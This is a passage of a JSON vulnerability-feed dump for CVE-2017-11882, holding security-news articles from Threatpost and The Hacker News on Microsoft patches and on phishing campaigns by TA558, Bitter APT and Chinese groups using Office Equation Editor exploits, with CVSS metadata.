"https://threatpost.com/microsoft-fixes-critical-ie-windows-bugs-february-patch-tuesday-021412/76213/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:29", "description": "One of the patches released by Microsoft last week is not providing protection against the vulnerability it was meant to fix, according to a researcher who today accused Microsoft of making functionality a higher priority than security.\n\nAccording to Tyler Reguly, a senior security engineer at nCircle Network Security Inc., last Tuesday\u2019s MS09-008 update does not fix the problem for all users, many of whom may not realize that they\u2019re still vulnerable to attack. \u201cWhen you get a patch from a vendor, you expect it to provide some level of security,\u201d said Reguly. \u201cBut MS09-008 only mitigates the problem, it doesn\u2019t patch it.\u201d\n\nRead [the full story](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9129722&source=rss_topic17>) [computerworld.com]. \n\nAlso see [nCircle\u2019s original advisory](<http://blog.ncircle.com/blogs/vert/archives/2009/03/successful_exploit_renders_mic.html>) [ncircle.com] and the [reaction from Microsoft\u2019s security response](<http://blogs.technet.com/srd/archive/2009/03/13/ms09-008-dns-and-wins-server-security-update-in-more-detail.aspx>) [technet.com] team.\n", "cvss3": {}, "published": "2009-03-17T14:19:18", "type": "threatpost", "title": "Microsoft spars with researcher over security patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:34", "id": "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", "href": "https://threatpost.com/microsoft-spars-researcher-over-security-patch-031709/72423/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:45", "description": "Microsoft\u2019s Bing is looking into SSL and other privacy \nsettings for the next version of their search engine. Currently the site strips \nSSL when forced into HTTPS and in turn, brings up an advisory on browsers signaling \nan unsafe connection.\n\n[Introduced at Toorcon, the Firefox extension ](<https://threatpost.com/plugin-firesheep-lays-open-web-20-insecurity-102510/>)allows \nattackers to capture site cookies from users on unsecured wireless networks and \nbrowse under their logon. \n\nWith the advent of Firesheep and subsequently, its surge of recently \nconverted hackers, HTTP session hijacking is becoming more and more of a \nconcern. Sites like Bing will have to adopt suitable security techniques to \ncontend with the extensions\u2019 further proliferation. \n\nFirefox 4, scheduled for release by the end of the year will \nhelp. [As \nreported in August](<https://threatpost.com/firefox-4-include-http-strict-transport-security-support-082710/>), the browser will receive HTTP Strict Transport \nSecurity, ensuring the browser always requests a safe HTTPS session from sites. \nHowever If sites like Bing don\u2019t implement SSL into sites, the lack of full-end \nencryption will still be a problem and HTTPS won\u2019t even be an option.\n\n[Network \nWorld has more on this story.](<http://www.networkworld.com/community/blog/microsoft-considering-encryption-bing>)\n\n** \n**\n", "cvss3": {}, "published": "2010-10-29T19:51:24", "type": "threatpost", "title": "To Combat Firesheep, Microsoft's Bing Looking Into SSL", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:46", "id": "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "href": "https://threatpost.com/combat-firesheep-microsoft-s-bing-looking-ssl-102910/74624/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2022-08-19T15:49:16", "description": "[![Cybercrime Group TA558](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhSF3-bdUgcyooEnkVmoAuf9mByPWvpo0qQ1Nswd04Ez2-TI9Sv6jdTYYCIvoW-JgAcS9U5-6hRItccG5cIe4cNT59zP19J6eXEa8XLxLq2Mxzbr0X0GNNQSlaM_z9ByEZwafQ_1WNvWNpu3YI3IOsvoVN43tgy4LsKHBUIEwW_yzpxOpIm_u-Jepe0/s728-e1000/cyber-attack.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhSF3-bdUgcyooEnkVmoAuf9mByPWvpo0qQ1Nswd04Ez2-TI9Sv6jdTYYCIvoW-JgAcS9U5-6hRItccG5cIe4cNT59zP19J6eXEa8XLxLq2Mxzbr0X0GNNQSlaM_z9ByEZwafQ_1WNvWNpu3YI3IOsvoVN43tgy4LsKHBUIEwW_yzpxOpIm_u-Jepe0/s728-e100/cyber-attack.jpg>)\n\nA financially motivated cybercrime group has been linked to an ongoing wave of attacks aimed at hospitality, hotel, and travel organizations in Latin America with the goal of installing malware on compromised systems.\n\nEnterprise security firm Proofpoint, which is tracking the group under the name TA558 dating all the way back to April 2018, called it a \"small crime threat actor.\"\n\n\"Since 2018, this group has used consistent tactics, techniques, and procedures to attempt to install a variety of malware including Loda RAT, Vjw0rm, and Revenge RAT,\" the company's threat research team [said](<https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel>) in a new report.\n\nThe group has been operational at a higher tempo in 2022 than usual, with intrusions mainly geared towards Portuguese and Spanish speakers in Latin America, and to a lesser extent in Western Europe and North America.\n\nPhishing campaigns mounted by the group involve sending malicious spam messages with reservation-themed lures such as hotel bookings that contain weaponized documents or URLs in a bid to entice unwitting users into installing trojans capable of reconnaissance, data theft, and distribution of follow-on payloads.\n\nThe attacks have subtly evolved over the years: The ones spotted between 2018 and 2021 leveraged emails with Word documents that either contained VBA macros or exploits for flaws such as [CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>) and [CVE-2017-8570](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-8570>) to download and install a mixture of malware such as AsyncRAT, Loda RAT, Revenge RAT, and Vjw0rm.\n\n[![Cybercrime Group TA558](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhf1-OFftMoPWFY8SQxjqyMzuueO4DWvvdsai8hxrPVmfzLMcf7AlZqOX_TT28YvoALA2Gtn8NkaajNSmEud9v1jPjPTL2y19wBJHE2OaleO43dmqwwQQ1CcFVJZok0_N0qZUaW8yQGsVBlD2lzCIbh_WggVEozhtWY_7tymfhzVdZiXVGw9-oTXJhu/s728-e1000/HACKING.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhf1-OFftMoPWFY8SQxjqyMzuueO4DWvvdsai8hxrPVmfzLMcf7AlZqOX_TT28YvoALA2Gtn8NkaajNSmEud9v1jPjPTL2y19wBJHE2OaleO43dmqwwQQ1CcFVJZok0_N0qZUaW8yQGsVBlD2lzCIbh_WggVEozhtWY_7tymfhzVdZiXVGw9-oTXJhu/s728-e100/HACKING.jpg>)\n\nIn recent months, however, TA558 has been observed pivoting away from macro-laden Microsoft Office attachments in favor of URLs and ISO files to achieve initial infection, a move likely in response to [Microsoft's decision to block macros](<https://thehackernews.com/2022/07/hackers-opting-new-attack-methods-after.html>) in files downloaded from the web by default.\n\nOf the 51 campaigns carried out by the group so far this year, 27 of them are said to have incorporated URLs pointing to ISO files and ZIP archives, in comparison to just five campaigns altogether from 2018 through 2021.\n\nProofpoint further noted that the intrusions chronicled under TA558 are part of a [broader](<https://unit42.paloaltonetworks.com/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business/>) [set](<https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html>) of [malicious](<https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html>) [activities](<https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america>) focusing on [victims](<https://thehackernews.com/2022/07/microsoft-resumes-blocking-office-vba.html>) in the Latin American region. But in the absence of any post-compromise activity, it's suspected that TA558 is a financially motivated cybercriminal actor.\n\n[![Cybercrime Group TA558](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjmvMaze6hyM5Ls6kCSqVK-L1d5Fra21pXBpsSElqp2NnDj6RCspcHXHflufjOJ-DvrZ_JEDFJRYirOg6MxMwW4hVwDrPxDxDxxItOHhvSP5wqEXF38GjwUvdNMrvvAe0vb2fk1Ulz9mv331uYTi5xon2Zr90oR0ltWXQqL0q-GVyHn-pe1LxSQHmjb/s728-e1000/hacking-data.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjmvMaze6hyM5Ls6kCSqVK-L1d5Fra21pXBpsSElqp2NnDj6RCspcHXHflufjOJ-DvrZ_JEDFJRYirOg6MxMwW4hVwDrPxDxDxxItOHhvSP5wqEXF38GjwUvdNMrvvAe0vb2fk1Ulz9mv331uYTi5xon2Zr90oR0ltWXQqL0q-GVyHn-pe1LxSQHmjb/s728-e100/hacking-data.jpg>)\n\n\"The malware used by TA558 can steal data including hotel customer user and credit card data, allow lateral movement, and deliver follow-on payloads,\" the researchers said. \"Activity conducted by this actor could lead to data theft of both corporate and customer data, as well as potential financial losses.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-19T13:35:00", "type": "thn", "title": "Cybercrime Group TA558 Targeting Hospitality, Hotel, and Travel Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570"], "modified": "2022-08-19T13:35:28", "id": "THN:5CEFBA9FAF414B3F57548EAB0EEA1718", "href": "https://thehackernews.com/2022/08/cybercrime-group-ta558-targeting.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:16", "description": "[![Nuclear Submarine Designer](https://thehackernews.com/images/-eih1k3cYVhA/YI-naR8atLI/AAAAAAAACbU/NvYXtTt5zpkVcilfqrwOd5oadfGSEyNuQCLcBGAsYHQ/s728-e1000/hacking.jpg)](<https://thehackernews.com/images/-eih1k3cYVhA/YI-naR8atLI/AAAAAAAACbU/NvYXtTt5zpkVcilfqrwOd5oadfGSEyNuQCLcBGAsYHQ/s0/hacking.jpg>)\n\nA threat actor believed to be working on behalf of Chinese state-sponsored interests was recently observed targeting a Russia-based defense contractor involved in designing nuclear submarines for the naval arm of the Russian Armed Forces.\n\nThe phishing attack, which singled out a general director working at the Rubin Design Bureau, leveraged the infamous \"Royal Road\" Rich Text Format (RTF) weaponizer to deliver a previously undocumented Windows backdoor dubbed \"**PortDoor**,\" according to Cybereason's Nocturnus threat intelligence team.\n\n\"Portdoor has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more,\" the researchers [said](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>) in a write-up on Friday.\n\nRubin Design Bureau is a submarine design center located in Saint Petersburg, accounting for the design of over [85% of submarines](<https://ckb-rubin.ru/en/company_profile/>) in the Soviet and Russian Navy since its origins in 1901, including several generations of strategic missile cruiser submarines.\n\n[![Nuclear Submarine Designer](https://thehackernews.com/images/-LhySSop9zLA/YI-dzc0pM9I/AAAAAAAACbM/Nhsd5V7X3tY_t7UM4MzbcCyd6fxoRAV1ACLcBGAsYHQ/s728-e1000/hacking.jpg)](<https://thehackernews.com/images/-LhySSop9zLA/YI-dzc0pM9I/AAAAAAAACbM/Nhsd5V7X3tY_t7UM4MzbcCyd6fxoRAV1ACLcBGAsYHQ/s0/hacking.jpg>) \n--- \nContent of the weaponized RTF document \n \nOver the years, Royal Road has earned its place as a [tool of choice](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>) among an array of Chinese threat actors such as Goblin Panda, Rancor Group, TA428, Tick, and Tonto Team. Known for exploiting multiple flaws in Microsoft's [Equation Editor](<https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018>) (CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802) as far back as late 2018, the attacks take the form of targeted spear-phishing campaigns that utilize malicious RTF documents to deliver custom malware to unsuspecting high-value targets.\n\nThis newly discovered attack is no different, with the adversary using a spear-phishing email addressed to the submarine design firm as an initial infection vector. While previous versions of Royal Road were found to drop encoded payloads by the name of \"8.t,\" the email comes embedded with a malware-laced document, which, when opened, delivers an encoded file called \"e.o\" to fetch the PortDoor implant, implying a new variant of the weaponizer in use.\n\nSaid to be engineered with obfuscation and persistence in mind, PortDoor runs the backdoor gamut with a wide range of features that allow it to profile the victim machine, escalate privileges, download and execute arbitrary payloads received from an attacker-controlled server, and export the results back to the server.\n\n\"The infection vector, social engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-03T07:34:00", "type": "thn", "title": "New Chinese Malware Targeted Russia's Largest Nuclear Submarine Designer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-05-03T16:14:45", "id": "THN:8EAD85C313EF85BE8D38BAAD851B106E", "href": "https://thehackernews.com/2021/05/new-chinese-malware-targeted-russias.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:26", "description": "[![airgap computer malware attack](https://thehackernews.com/images/-XDTHXeRiSOs/XtiwKuAffDI/AAAAAAAAAZ0/agv-iIrKqt8IiznmwrS_g-Hhgu-R--8RgCLcBGAsYHQ/s728-e100/malware.jpg)](<https://thehackernews.com/images/-XDTHXeRiSOs/XtiwKuAffDI/AAAAAAAAAZ0/agv-iIrKqt8IiznmwrS_g-Hhgu-R--8RgCLcBGAsYHQ/s728-e100/malware.jpg>)\n\nA Chinese threat actor has developed new capabilities to target air-gapped systems in an attempt to exfiltrate sensitive data for espionage, according to a newly published research by Kaspersky yesterday. \n \nThe APT, known as Cycldek, Goblin Panda, or Conimes, employs an extensive toolset for lateral movement and information stealing in victim networks, including previously unreported custom tools, tactics, and procedures in attacks against government agencies in Vietnam, Thailand, and Laos. \n \n\"One of the newly revealed tools is named **USBCulprit **and has been found to rely on USB media in order to exfiltrate victim data,\" [Kaspersky](<https://securelist.com/cycldek-bridging-the-air-gap/97157/>) said. \"This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\" \n \nFirst observed by [CrowdStrike](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) in 2013, Cycldek has a long history of singling out defense, energy, and government sectors in Southeast Asia, particularly Vietnam, using decoy documents that exploit known vulnerabilities (e.g., CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) in Microsoft Office to drop a malware called NewCore RAT. \n \n\n\n## Exfiltrating Data to Removable Drives\n\n \nKaspersky's analysis of NewCore revealed two different variants (named BlueCore and RedCore) centered around two clusters of activity, with similarities in both code and infrastructure, but also contain features that are exclusive to RedCore \u2014 namely a keylogger and an RDP logger that captures details about users connected to a system via RDP. \n \n\n\n[![](https://thehackernews.com/images/-Uo7TkL_TEQg/XtirFVGHNWI/AAAAAAAAAZk/3fpINW9IErAOfGCG0T7fZGr5K9LM3BnuACLcBGAsYHQ/s728-e100/usb-virus.jpg)](<https://thehackernews.com/images/-Uo7TkL_TEQg/XtirFVGHNWI/AAAAAAAAAZk/3fpINW9IErAOfGCG0T7fZGr5K9LM3BnuACLcBGAsYHQ/s728-e100/usb-virus.jpg>)\n\n \n\"Each cluster of activity had a different geographical focus,\" the researchers said. \"The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018.\" \n \nBoth BlueCore and RedCore implants, in turn, downloaded a variety of additional tools to facilitate lateral movement (HDoor) and extract information (JsonCookies and ChromePass) from compromised systems. \n \nChief among them is a malware called USBCulprit that's capable of scanning a number of paths, collecting documents with specific extensions (*.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf), and exporting them to a connected USB drive. \n \n\n\n[![](https://thehackernews.com/images/-T3eT2rv9TYU/XtirEJq7SnI/AAAAAAAAAZg/x2SxjApz6oolC0VavLfhqMYUtS4eQTMcQCLcBGAsYHQ/s728-e100/usb-computer-virus.jpg)](<https://thehackernews.com/images/-T3eT2rv9TYU/XtirEJq7SnI/AAAAAAAAAZg/x2SxjApz6oolC0VavLfhqMYUtS4eQTMcQCLcBGAsYHQ/s728-e100/usb-computer-virus.jpg>)\n\n \nWhat's more, the malware is programmed to copy itself selectively to certain removable drives so it can move laterally to other air-gapped systems each time an infected USB drive is inserted into another machine. \n \nA telemetry analysis by Kaspersky found that the first instance of the binary dates all the way back to 2014, with the latest samples recorded at the end of last year. \n \nThe initial infection mechanism relies on leveraging malicious binaries that mimic legitimate antivirus components to load USBCulprit in what's called [DLL search order hijacking](<https://attack.mitre.org/techniques/T1038/>) before it proceeds to collect the relevant information, save it in the form of an encrypted RAR archive, and exfiltrate the data to a connected removable device. \n \n\"The characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines,\" the researchers said. \"This would explain the lack of any network communication in the malware and the use of only removable media as a means of transferring inbound and outbound data.\" \n \nUltimately, the similarities and differences between the two pieces of malware are indicative of the fact that the actors behind the clusters are sharing code and infrastructure, while operating as two different offshoots under a single larger entity. \n \n\"Cycldek is an example of an actor that has broader capability than publicly perceived,\" Kaspersky concluded. \"While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\"\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-04T08:31:00", "type": "thn", "title": "New USBCulprit Espionage Tool Steals Data From Air-Gapped Computers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "modified": "2020-06-04T08:31:39", "id": "THN:42E3306FC75881CF8EBD30FA8291FF29", "href": "https://thehackernews.com/2020/06/air-gap-malware-usbculprit.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:17", "description": "[![Microsoft Issues Security Patches Critical Vulnerabilities](https://2.bp.blogspot.com/-beOJSQDFs8E/WlWzGhDEy1I/AAAAAAAAvao/HtLyZwdkdO0s6swi2W8MGUFOiL97VBjtACLcBGAs/s1600/microsoft-windows-update.png)](<https://2.bp.blogspot.com/-beOJSQDFs8E/WlWzGhDEy1I/AAAAAAAAvao/HtLyZwdkdO0s6swi2W8MGUFOiL97VBjtACLcBGAs/s1600/microsoft-windows-update.png>)\n\nIf you think that only CPU updates that address this year's major security flaws\u2014[Meltdown and Spectre](<https://thehackernews.com/2018/01/meltdown-spectre-patches.html>)\u2014are the only ones you are advised to grab immediately, there are a handful of major security flaws that you should pay attention to. \n \nMicrosoft has issued its first Patch Tuesday for 2018 to address 56 CVE-listed flaws, including a zero-day vulnerability in MS Office related that had been actively exploited by several threat groups in the wild. \n \nSixteen of the security updates are listed as critical, 38 are rated important, one is rated moderate, and one is rated as low in severity. The updates address security flaws in Windows, Office, Internet Explorer, Edge, ChakraCore, ASP.NET, and the .NET Framework. \n \nThe zero-day vulnerability ([CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>)), described by Microsoft as a memory corruption flaw in Office, is already being targeted in the wild by several threat actor groups in the past few months. \n \nThe vulnerability, discovered by several researchers from Chinese companies Tencent and Qihoo 360, ACROS Security's 0Patch Team, and Check Point Software Technologies, can be exploited for remote code execution by tricking a targeted user into opening a specially crafted malicious Word file in MS Office or WordPad. \n \nAccording to the company, this security flaw is related to CVE-2017-11882\u2014a 17-year-old [vulnerability in the Equation Editor](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>) functionality (EQNEDT32.EXE), which Microsoft addressed in November. \n \nWhen researchers at 0Patch were analysing CVE-2017-11882, they discovered a new, related vulnerability (CVE-2018-0802). More details of CVE-2018-0802 can be found in a [blog post](<https://research.checkpoint.com/another-office-equation-rce-vulnerability/>) published by Check Point. \n \nBesides CVE-2018-0802, the company has addressed nine more remote code execution and memory disclosure vulnerabilities in MS Office. \n \nA spoofing vulnerability (CVE-2018-0819) in Microsoft Outlook for MAC, which has been listed as publicly disclosed ([Mailsploit attack](<https://thehackernews.com/2017/12/email-spoofing-client.html>)), has also addressed by the company. The vulnerability does not allow some versions Outlook for Mac to handle the encoding and display of email addresses properly, causing antivirus or anti-spam scanning not to work as intended. \n \nMicrosoft also addressed a certificate validation bypass vulnerability (CVE-2018-0786) in .NET Framework (and .NET Core) that could allow malware authors to show their invalid certificates as valid. \n \n\"An attacker could present a certificate that is marked invalid for a specific use, but the component uses it for that purpose,\" describes Microsoft. \"This action disregards the Enhanced Key Usage taggings.\" \n \nThe company has also patched a total of 15 vulnerabilities in the scripting engine used by Microsoft Edge and Internet Explorer. \n \nAll these flaws could be exploited for remote code execution by tricking a targeted user into opening a specially-crafted webpage that triggers a memory corruption error, though none of these has been exploited in the wild yet. \n \nMeanwhile, Adobe has [patched](<https://helpx.adobe.com/security/products/flash-player/apsb18-01.html>) a single, out of bounds read flaw (CVE-2018-4871) this month that could allow for information disclosure, though no active exploits have been seen in the wild. \n \nUsers are strongly advised to apply security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers. \n \nFor installing security updates, simply head on to Settings \u2192 Update & security \u2192 Windows Update \u2192 Check for updates, or you can install the updates manually.\n", "cvss3": {}, "published": "2018-01-09T19:35:00", "type": "thn", "title": "Microsoft Releases Patches for 16 Critical Flaws, Including a Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2018-0819", "CVE-2018-4871", "CVE-2018-0786"], "modified": "2018-01-11T07:11:17", "id": "THN:ED087560040A02BCB1F68DE406A7F577", "href": "https://thehackernews.com/2018/01/microsoft-security-patch.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-12T02:22:45", "description": "[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgx6lZB3oJ9X1sLlKCznoOeSkcDGdxDDzLpQUslIFxcqcdMH_UDcAqH4PjZiqkCxL4jI-B00Zx79nco8uEEf5XiuDqkexKPHK5G1oPT3v5UXngC8t4QHYPLfIhQTOw0d5FZR2WUXYg38_ydmYOd8biQq4tgAK_UHmsEyzslVH8sLV19IMC1QE6NMR95/s728-e100/hacker-code.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgx6lZB3oJ9X1sLlKCznoOeSkcDGdxDDzLpQUslIFxcqcdMH_UDcAqH4PjZiqkCxL4jI-B00Zx79nco8uEEf5XiuDqkexKPHK5G1oPT3v5UXngC8t4QHYPLfIhQTOw0d5FZR2WUXYg38_ydmYOd8biQq4tgAK_UHmsEyzslVH8sLV19IMC1QE6NMR95/s728-e100/hacker-code.jpg>)\n\nAn espionage-focused threat actor known for targeting China, Pakistan, and Saudi Arabia has expanded to set its sights on Bangladeshi government organizations as part of an ongoing campaign that commenced in August 2021.\n\nCybersecurity firm Cisco Talos attributed the activity with moderate confidence to a hacking group dubbed the [Bitter APT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat>) based on overlaps in the command-and-control (C2) infrastructure with that of prior campaigns mounted by the same actor.\n\n\"Bangladesh fits the profile we have defined for this threat actor, previously targeting Southeast Asian countries including [China](<https://www.anomali.com/blog/suspected-bitter-apt-continues-targeting-government-of-china-and-chinese-organizations>), Pakistan, and Saudi Arabia,\" Vitor Ventura, lead security researcher at Cisco Talos for EMEA and Asia, [told](<https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html>) The Hacker News.\n\n\"And now, in this latest campaign, they have widened their reach to Bangladesh. Any new country in southeast Asia being targeted by Bitter APT shouldn't be of surprise.\"\n\nBitter (aka APT-C-08 or T-APT-17) is suspected to be a South Asian hacking group motivated primarily by intelligence gathering, an operation that's facilitated by means of malware such as BitterRAT, ArtraDownloader, and AndroRAT. Prominent targets include the energy, engineering, and government sectors.\n\nThe earliest attacks distributing the mobile version of BitterRAT date back to September 2014, with the actor having a history of leveraging zero-day flaws \u2014 [CVE-2021-1732](<https://blog.cyble.com/2021/02/24/bitter-apt-enhances-its-capability-with-windows-kernel-zero-day-exploit/>) and [CVE-2021-28310](<https://thehackernews.com/2021/04/nsa-discovers-new-vulnerabilities.html>) \u2014 to its advantage and accomplishing its adversarial objectives.\n\n[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEje8jC-uVfJtCg-HT90ER0XL1ynji-bMSmKY4TsMgVZDJ4BUis2Ee9BqhaK1IgRgN3C39Ble5vyCaoUWCWOSw_sCPSi1K1pqxhfFDtU7-XFOlKQELXIUmacfXYgeFx_YhnGNvj-1DRRGm2mRliJTxxHv8CqVxw48P0ghcuKJ0YObfTzh23rHBy_Bz3i/s728-e100/talos.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEje8jC-uVfJtCg-HT90ER0XL1ynji-bMSmKY4TsMgVZDJ4BUis2Ee9BqhaK1IgRgN3C39Ble5vyCaoUWCWOSw_sCPSi1K1pqxhfFDtU7-XFOlKQELXIUmacfXYgeFx_YhnGNvj-1DRRGm2mRliJTxxHv8CqVxw48P0ghcuKJ0YObfTzh23rHBy_Bz3i/s728-e100/talos.jpg>)\n\nThe latest campaign, targeting an elite entity of the Bangladesh government, involves sending spear-phishing emails to high-ranking officers of the Rapid Action Battalion Unit of the Bangladesh police (RAB).\n\nAs is typically observed in other social engineering attacks of this kind, the missives are designed to lure the recipients into opening a weaponized RTF document or a Microsoft Excel spreadsheet that exploits previously known flaws in the software to deploy a new trojan dubbed \"ZxxZ.\"\n\nZxxZ, named so after a separator used by the malware when sending information back to the C2 server, is a 32-bit Windows executable compiled in Visual C++.\n\n\"The trojan masquerades as a Windows Security update service and allows the malicious actor to perform remote code execution, allowing the attacker to perform any other activities by installing other tools,\" the researchers explained.\n\nWhile the malicious RTF document exploits a memory corruption vulnerability in Microsoft Office's Equation Editor ([CVE-2017-11882](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>)), the Excel file abuses two remote code execution flaws, [CVE-2018-0798](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0798>) and 